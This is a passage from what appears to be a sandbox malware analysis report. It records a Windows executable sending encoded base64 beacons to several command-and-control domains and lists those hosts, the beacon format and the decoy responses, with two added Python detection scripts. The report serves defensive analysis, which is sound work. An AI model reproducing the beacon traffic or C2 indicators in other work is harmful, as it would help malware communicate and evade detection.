                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body>... partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]
                                                  Sep 16, 2024 09:40:11.717679024 CEST | 1236 | IN | Data Raw: 2e 32 73 35 34 2e 37 2d 32 38 20 31 31 37 2e 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 2d 36 32 31 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 2d 33 37 34 2e 38 20
                                                  Data Ascii: .2s54.7-28 117.5-28 128.6 28 128.6 28H-621z"/> <path class="st0" d="M-374.8 275.2s83.7-28 179.9-28S2 275.2 2 275.2h-376.8z"/> </g> </g> <g id="tracks"> <path class="st2" d="M9.8 282.4h-3L0 307.6h3z"/> <path class="st2" d=
                                                  Sep 16, 2024 09:40:11.717694044 CEST | 1236 | IN | Data Raw: 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 31 39 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 30 39 2e 38 20 32 38
                                                  Data Ascii: class="st2" d="M199.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M209.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M219.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M229.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d=
                                                  Sep 16, 2024 09:40:11.717708111 CEST | 1236 | IN | Data Raw: 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 31 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d
                                                  Data Ascii: .2h3z"/> <path class="st2" d="M419.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M429.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M439.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M449.8 282.4h-3l-6.8 25.2h3z"/> <p
                                                  Sep 16, 2024 09:40:11.717724085 CEST | 896 | IN | Data Raw: 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 38 37 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22
                                                  Data Ascii: > <path class="st2" d="M870 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M860 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M850 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M840 282.4h-3l-6.8 25.2h3z"/> <path class="st2"
                                                  Sep 16, 2024 09:40:11.717739105 CEST | 1236 | IN | Data Raw: 73 3d 22 73 74 32 22 20 64 3d 22 4d 37 31 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 37 30 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36
                                                  Data Ascii: s="st2" d="M710 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M700 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M690 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M680 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M670 282.4h-
                                                  Sep 16, 2024 09:40:11.717753887 CEST | 224 | IN | Data Raw: 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 34 33 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20
                                                  Data Ascii: <path class="st2" d="M-430.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-420.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-410.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-400.2 282.4h-3l-6
                                                  Sep 16, 2024 09:40:11.717767000 CEST | 1236 | IN | Data Raw: 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 33 39 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70
                                                  Data Ascii: .8 25.2h3z"/> <path class="st2" d="M-390.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-380.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-370.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-360.2 282.4h-3l-6.8
                                                  Sep 16, 2024 09:40:11.717782021 CEST | 224 | IN | Data Raw: 22 20 64 3d 22 4d 2d 31 39 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 31 38 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c
                                                  Data Ascii: " d="M-190.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-180.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-170.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-160.2 282.4h-3l-6.8 25.2h3z"/>
                                                  Sep 16, 2024 09:40:11.718167067 CEST | 1236 | IN | Data Raw: 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 31 35 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d
                                                  Data Ascii: <path class="st2" d="M-150.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-140.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-130.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-120.2 282.4h-3l-6.8 25.2h3z"/> <pa
                                                  Sep 16, 2024 09:40:11.722666979 CEST | 1236 | IN | Data Raw: 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 35 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 34 30 20 32 38
                                                  Data Ascii: th class="st2" d="M450 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M440 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M430 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M420 282.4h-3l-6.8 25.2h3z"/> <path class="st2"
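
Sessions 23 and 24 show the beacon shape of this sample in the clear: a POST to /vnd3/ whose body is a single form field, prutfR_P=<raw base64>, a hard-coded Android SamsungBrowser User-Agent sent by a Windows executable under C:\Program Files (x86), Origin and Referer pointing back at the POST target, and a "404 Not Found" page of exactly 18121 bytes for every request. The Python below is an added example for this report, not Joe Sandbox output and not code from the sample: it rebuilds the body bytes from the report's "Data Raw" hex row of the first POST, checks them against the "Data Ascii" row, splits the body without letting a form decoder mangle the base64 (a form decoder turns "+" into a space), and applies a set of heuristics for this beacon shape. The request record, RESPONSES and the heuristics are my transcription and my assumptions, not Joe Sandbox signatures.

```python
from __future__ import annotations

import base64
import re

# Constructed input, transcribed from session 23 above: the POST request line,
# the headers the checks use, the "Data Raw" hex row of the body, the matching
# "Data Ascii" row, and the process that sent the request.
PROCESS_PATH = (r"C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq"
                r"\TrBUxuahdhJ.exe")
REQUEST = {
    "method": "POST",
    "uri": "/vnd3/",
    "headers": {
        "Host": "www.quantumnests.xyz",
        "Origin": "http://www.quantumnests.xyz",
        "Referer": "http://www.quantumnests.xyz/vnd3/",
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) "
                      "AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 "
                      "Chrome/34.0.1847.76 Mobile Safari/537.36",
    },
}
BODY_HEX = (
    "70 72 75 74 66 52 5f 50 3d 38 61 70 48 36 47 76 48 6c 49 67 68 39 43 77 "
    "55 41 53 79 7a 69 73 39 67 6d 35 6c 6c 68 50 6e 49 79 48 50 4e 71 34 6a "
    "71 69 7a 74 43 55 69 57 67 31 75 63 78 47 78 43 7a 38 6e 32 63 6d 6d 79 "
    "42 45 51 35 74 39 65 76 6b 35 30 43 69 2f 79 5a 43 55 5a 64 65 51 6c 68 "
    "56 68 59 52 31 66 45 70 58 44 74 66 64 64 6c 70 75 4f 50 55 42 69 62 4a "
    "52 6e 77 47 31 4f 2b 64 7a 2f 38 6d 37 59 57 73 46 31 47 79 2f 59 31 39 "
    "58 59 6d 63 44 4e 64 62 41 77 34 2f 45 6f 6b 6d 49 63 79 76 43 66 47 39 "
    "7a 59 2f 33 30 30 45 74 4a 66 4b 64 48 7a 63 33 71 78 36 35 71 66 70 61 "
    "62 34 41 70 52 71 62 35 50 68 6b 62 4d 73 69 33 77 74 6b 4c 4b 54 76 53 "
    "35 52 37 67 4f 73 4c 77 41 63 6c 73 68"
)
BODY_ASCII = ("prutfR_P=8apH6GvHlIgh9CwUASyzis9gm5llhPnIyHPNq4jqiztCUiWg1ucxGxCz8n2c"
              "mmyBEQ5t9evk50Ci/yZCUZdeQlhVhYR1fEpXDtfddlpuOPUBibJRnwG1O+dz"
              "/8m7YWsF1Gy/Y19XYmcDNdbAw4/EokmIcyvCfG9zY/300EtJfKdHzc3qx65q"
              "fpab4ApRqb5PhkbMsi3wtkLKTvS5R7gOsLwAclsh")
# (status, Content-Length) of every response shown in sessions 23 and 24.
RESPONSES = [(404, 18121), (404, 18121), (404, 18121), (404, 18121)]

B64_VALUE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def hex_row_to_bytes(row: str) -> bytes:
    """Rebuild the bytes from a Joe Sandbox 'Data Raw' row ('70 72 75 ...')."""
    return bytes.fromhex(row.replace(" ", ""))


def split_beacon_body(body: bytes) -> tuple[str, bytes]:
    """Split a one-field 'name=value' body and base64-decode the value.

    Deliberately not urllib.parse.parse_qs: a form decoder maps '+' to a space
    and would silently corrupt the base64 the bot writes unescaped."""
    name, sep, value = body.partition(b"=")
    if not sep or b"&" in value:
        raise ValueError("expected exactly one name=value field")
    text = value.decode("ascii")
    if not B64_VALUE.match(text) or len(text) % 4:
        raise ValueError("value is not a complete raw base64 string")
    return name.decode("ascii"), base64.b64decode(text, validate=True)


def beacon_indicators(req: dict, body: bytes, process_path: str) -> list[str]:
    """Assumed heuristics (mine, not Joe Sandbox signatures) for this beacon shape."""
    h = req["headers"]
    hits = []
    if "Android" in h.get("User-Agent", "") and process_path.lower().endswith(".exe"):
        hits.append("Android browser User-Agent sent by a Windows executable")
    if re.fullmatch(r"/[a-z0-9]{4}/", req["uri"]):
        hits.append("request path is a single short directory")
    if h.get("Referer") == "http://" + h.get("Host", "") + req["uri"]:
        hits.append("Referer is the POST target itself")
    try:
        name, blob = split_beacon_body(body)
    except ValueError as exc:
        hits.append(f"body does not parse as a beacon: {exc}")
    else:
        # A browser would percent-encode '+', '/' and '=' inside a field value.
        if b"%" not in body and (b"+" in body or b"/" in body):
            hits.append(f"field {name!r} carries {len(blob)} bytes of unescaped base64")
    return hits


def same_decoy_response(responses: list[tuple[int, int]]) -> bool:
    """True when every answer is a 404 of identical length: a static decoy page,
    not a web server reacting to different requests."""
    return len(set(responses)) == 1 and responses[0][0] == 404


if __name__ == "__main__":
    body = hex_row_to_bytes(BODY_HEX)
    print("hex row matches ascii row:", body.decode("ascii") == BODY_ASCII)
    for hit in beacon_indicators(REQUEST, body, PROCESS_PATH):
        print(" -", hit)
    print("static 404 decoy:", same_decoy_response(RESPONSES))
```

The 404 is what the C2 shows anyone who browses to it; the tell is not the status code but the same Content-Length on every answer, across both sessions, to a POST and to a GET with different query strings. The decoded field is 165 bytes for a 229-byte body, which matches the Content-Length of the parcelfly POST in session 26 below, so the beacon payload size is stable across C2 hosts.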


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  25 | 192.168.2.5 | 49737 | 84.32.84.32 | 80 | 2796 | C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Sep 16, 2024 09:40:24.971071005 CEST | 785 | OUT | POST /n59g/ HTTP/1.1
                                                  Host: www.parcelfly.net
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 209
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.parcelfly.net
                                                  Referer: http://www.parcelfly.net/n59g/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 30 72 50 6b 31 67 36 38 4e 31 5a 33 4f 57 33 6a 38 4c 73 73 6c 67 66 58 77 55 70 69 2b 6e 68 44 37 53 65 57 4b 30 63 2f 34 61 32 37 32 64 61 55 46 79 7a 65 32 46 5a 61 57 57 58 38 69 6b 6d 77 7a 7a 71 6a 6b 72 6d 67 73 6f 34 44 41 57 72 66 39 34 34 76 70 74 48 77 32 73 4b 6c 37 32 50 71 39 43 53 46 44 4a 68 30 51 35 74 74 55 4c 70 54 59 70 39 4b 4f 38 58 4b 6d 42 44 41 6b 51 49 74 4f 31 6c 75 2f 64 30 59 66 7a 70 31 31 76 68 36 39 76 51 46 33 68 6b 63 31 30 55 51 6b 49 61 47 53 72 6f 5a 4f 7a 79 65 4f 4d 62 59 34 6a 36 75 6e 7a 4e 4f 66 50 68 64 5a 67 78 55 76 6b 79 63 4f 6f 4b 6d 36 6a 45 3d
                                                  Data Ascii: prutfR_P=0rPk1g68N1Z3OW3j8LsslgfXwUpi+nhD7SeWK0c/4a272daUFyze2FZaWWX8ikmwzzqjkrmgso4DAWrf944vptHw2sKl72Pq9CSFDJh0Q5ttULpTYp9KO8XKmBDAkQItO1lu/d0Yfzp11vh69vQF3hkc10UQkIaGSroZOzyeOMbY4j6unzNOfPhdZgxUvkycOoKm6jE=


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  26 | 192.168.2.5 | 49738 | 84.32.84.32 | 80 | 2796 | C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Sep 16, 2024 09:40:27.515270948 CEST | 805 | OUT | POST /n59g/ HTTP/1.1
                                                  Host: www.parcelfly.net
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 229
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.parcelfly.net
                                                  Referer: http://www.parcelfly.net/n59g/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 30 72 50 6b 31 67 36 38 4e 31 5a 33 63 6e 48 6a 35 6f 55 73 6e 41 66 57 31 55 70 69 77 33 68 48 37 53 43 57 4b 78 6b 76 34 6f 69 37 33 38 71 55 45 33 50 65 78 46 5a 61 5a 32 57 32 6d 6b 6d 72 7a 30 6a 41 6b 70 79 67 73 6f 63 44 41 54 58 66 39 4c 51 73 70 39 48 79 35 4d 4b 6e 31 57 50 71 39 43 53 46 44 4a 63 76 51 36 64 74 56 36 5a 54 4b 37 46 46 48 63 58 4c 68 42 44 41 67 51 49 68 4f 31 6c 63 2f 59 51 79 66 78 68 31 31 76 78 36 38 39 30 45 38 68 6b 53 37 55 56 35 33 4b 4c 65 54 35 39 4a 52 52 44 41 57 75 6a 74 39 56 58 45 39 52 46 6d 4d 76 4e 6c 4a 7a 35 6a 2b 55 54 31 55 4c 61 57 6b 30 54 45 57 64 59 31 31 4d 4d 4f 72 74 4f 37 71 56 56 62 7a 64 43 74
                                                  Data Ascii: prutfR_P=0rPk1g68N1Z3cnHj5oUsnAfW1Upiw3hH7SCWKxkv4oi738qUE3PexFZaZ2W2mkmrz0jAkpygsocDATXf9LQsp9Hy5MKn1WPq9CSFDJcvQ6dtV6ZTK7FFHcXLhBDAgQIhO1lc/YQyfxh11vx6890E8hkS7UV53KLeT59JRRDAWujt9VXE9RFmMvNlJz5j+UT1ULaWk0TEWdY11MMOrtO7qVVbzdCt
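
Sessions 25 and 26 post two different bodies to www.parcelfly.net that nevertheless begin with the same characters (prutfR_P=0rPk1g68N1Z3), and the two POSTs to www.quantumnests.xyz in session 23 share an even longer run: the "Data Raw" hex of the second one starts with the same 51 bytes as the first (prutfR_P=8apH6GvH...q4jqiz). The Python below is an added example, not part of the report and not code from the sample, that turns this observation into a measurement: it decodes the two parcelfly bodies (copied from the "Data Ascii" rows above) and counts the offsets at which the two ciphertexts carry the same byte. Two messages encrypted under independent keystreams agree at a given offset with probability about 1/256, whatever the plaintext; a count many times higher means the same keystream was applied to both beacons and the plaintexts share a fixed layout at those offsets. The 10x threshold is my assumption.

```python
from __future__ import annotations

import base64

# Constructed input: the two POST bodies to www.parcelfly.net from sessions 25
# and 26 above, copied from the report's "Data Ascii" rows (209 and 229 bytes).
BODY_25 = ("prutfR_P=0rPk1g68N1Z3OW3j8LsslgfXwUpi+nhD7SeWK0c/4a272daUFyze2FZaWWX8ikmwzz"
           "qjkrmgso4DAWrf944vptHw2sKl72Pq9CSFDJh0Q5ttULpTYp9KO8XKmBDAkQItO1lu/d0Yfzp1"
           "1vh69vQF3hkc10UQkIaGSroZOzyeOMbY4j6unzNOfPhdZgxUvkycOoKm6jE=")
BODY_26 = ("prutfR_P=0rPk1g68N1Z3cnHj5oUsnAfW1Upiw3hH7SCWKxkv4oi738qUE3PexFZaZ2W2mkmrz0"
           "jAkpygsocDATXf9LQsp9Hy5MKn1WPq9CSFDJcvQ6dtV6ZTK7FFHcXLhBDAgQIhO1lc/YQyfxh1"
           "1vx6890E8hkS7UV53KLeT59JRRDAWujt9VXE9RFmMvNlJz5j+UT1ULaWk0TEWdY11MMOrtO7qV"
           "VbzdCt")


def beacon_blob(body: str) -> bytes:
    """Base64-decode the single field value.

    Split on the first '=' rather than form-decoding: the bot sends '+', '/'
    and the '=' padding unescaped, and a form decoder would turn '+' into ' '."""
    _name, _sep, value = body.partition("=")
    return base64.b64decode(value, validate=True)


def common_prefix_len(a: bytes, b: bytes) -> int:
    """Length of the identical leading run of the two ciphertexts."""
    n = 0
    for x, y in zip(a, b):
        if x != y:
            break
        n += 1
    return n


def equal_offsets(a: bytes, b: bytes) -> list[int]:
    """Offsets at which both ciphertexts carry the same byte."""
    return [i for i, (x, y) in enumerate(zip(a, b)) if x == y]


def keystream_reuse_suspected(a: bytes, b: bytes, factor: float = 10.0) -> bool:
    """Compare the observed agreement with the ~1/256 per offset expected when
    two messages are encrypted under independent keystreams.  `factor` is an
    assumed margin chosen for short messages like these beacons."""
    overlap = min(len(a), len(b))
    if overlap == 0:
        return False
    return len(equal_offsets(a, b)) > factor * overlap / 256


if __name__ == "__main__":
    a, b = beacon_blob(BODY_25), beacon_blob(BODY_26)
    same = equal_offsets(a, b)
    print(f"decoded sizes: {len(a)} and {len(b)} bytes")
    print(f"identical prefix: {common_prefix_len(a, b)} bytes")
    print(f"equal bytes at {len(same)} offsets (random expectation about "
          f"{min(len(a), len(b)) / 256:.2f}): {same}")
    print("keystream reuse suspected:", keystream_reuse_suspected(a, b))
```

This does not identify the cipher. It does tell you the encoding is deterministic per offset under a key that did not change between the two beacons, so a decryptor built from one capture applies to the next, and the positions that agree map out the fixed fields of the plaintext. Note that the shared prefix differs between the two C2 hosts in this report (8apH6GvH... for quantumnests.xyz, 0rPk1g68... for parcelfly.net), so a network rule anchored on it is per host at best; the field name, the path shape and the User-Agent string are the more durable indicators.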


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  27 | 192.168.2.5 | 49739 | 84.32.84.32 | 80 | 2796 | C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGF HNq\TrBUxuahdhJ.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Sep 16, 2024 09:40:30.062365055 CEST | 1822 | OUT | POST /n59g/ HTTP/1.1
                                                  Host: www.parcelfly.net
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 1245
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.parcelfly.net
                                                  Referer: http://www.parcelfly.net/n59g/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Data Ascii: prutfR_P= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.5 | 49740 | 84.32.84.32 | 80 | 2796 | C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe

Timestamp | Bytes transferred | Direction | Data
Sep 16, 2024 09:40:32.607336044 CEST | 525 | OUT | GET /n59g/?prutfR_P=5pnE2UHiCW8ObGXSgpx/iGO8gW0d7AEBtxaudhAi15+uyfG3JVq1h0FDH1nQvWuKz1Kon5CV4Z0icGbf56g2ha7dmOKO9m7V5QX/Ut0iNssFIOAJa+JBBsuFpAHajyYobg==&u8b=M0MH_xux6 HTTP/1.1
Host: www.parcelfly.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Sep 16, 2024 09:40:33.098380089 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: hcdn
Date: Mon, 16 Sep 2024 07:40:33 GMT
Content-Type: text/html
Content-Length: 10072
Connection: close
Vary: Accept-Encoding
alt-svc: h3=":443"; ma=86400
x-hcdn-request-id: f58a9bd775a1fbe75eb05c8b5603e7f1-bos-edge2
Expires: Mon, 16 Sep 2024 07:40:32 GMT
Cache-Control: no-cache
Accept-Ranges: bytes
Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.5 | 49741 | 154.23.176.197 | 80 | 2796 | C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe

Timestamp | Bytes transferred | Direction | Data
Sep 16, 2024 09:40:47.215579987 CEST | 797 | OUT | POST /0vb3/ HTTP/1.1
Host: www.shipincheshi.skin
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US
Connection: close
Content-Length: 209
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Origin: http://www.shipincheshi.skin
Referer: http://www.shipincheshi.skin/0vb3/
User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Data Ascii: prutfR_P=8WbgRjkyRhfL/0Kk9/GHHAUIUlpUApXNEHyl9xd1GSd/Hzi9g0VgaY04zDoBQEbj7w52soPRrrBT1iMTfGKKVk7+ych6vH9o+tYndZ2bvJw7A+neyin4TqzmTsQELEE4UJXRY0l3s7vCuKaPznH26YQi1S4SfFVov4WG+z/PiJLHaQhJcgu/in6bhPOsnDA8eoeWJ8E=
Sep 16, 2024 09:40:48.170674086 CEST | 1236 | IN | HTTP/1.1 404 Not Found
Date: Mon, 16 Sep 2024 07:52:08 GMT
Server: Apache
Upgrade: h2
Connection: Upgrade, close
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4837
Content-Type: text/html; charset=utf-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.5 | 49742 | 154.23.176.197 | 80 | 2796 | C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe

Timestamp | Bytes transferred | Direction | Data
Sep 16, 2024 09:40:49.773149014 CEST | 817 | OUT | POST /0vb3/ HTTP/1.1
Host: www.shipincheshi.skin
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US
Connection: close
Content-Length: 229
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Origin: http://www.shipincheshi.skin
Referer: http://www.shipincheshi.skin/0vb3/
User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Data Ascii: prutfR_P=8WbgRjkyRhfLtHSk/YqHOAUJaFpUWZXJEHOl9wplGBp/JzS9h1VgdY04rToENUbs7w0VsozRrqhT1gUTfViJU07468h4hn9o+tYndZihvJI7AN/ezDn/SqzlWcQEBkEkUJX/Ywsas5nCuIyPiVvxwYQkoC4CQQgUpYnM9Tul//PfbmMjGCmXxHWjxcGb2zhVELOmXrS5MQ7f9eQorK9YHuSnH0/h
Sep 16, 2024 09:40:50.724030972 CEST | 1236 | IN | HTTP/1.1 404 Not Found
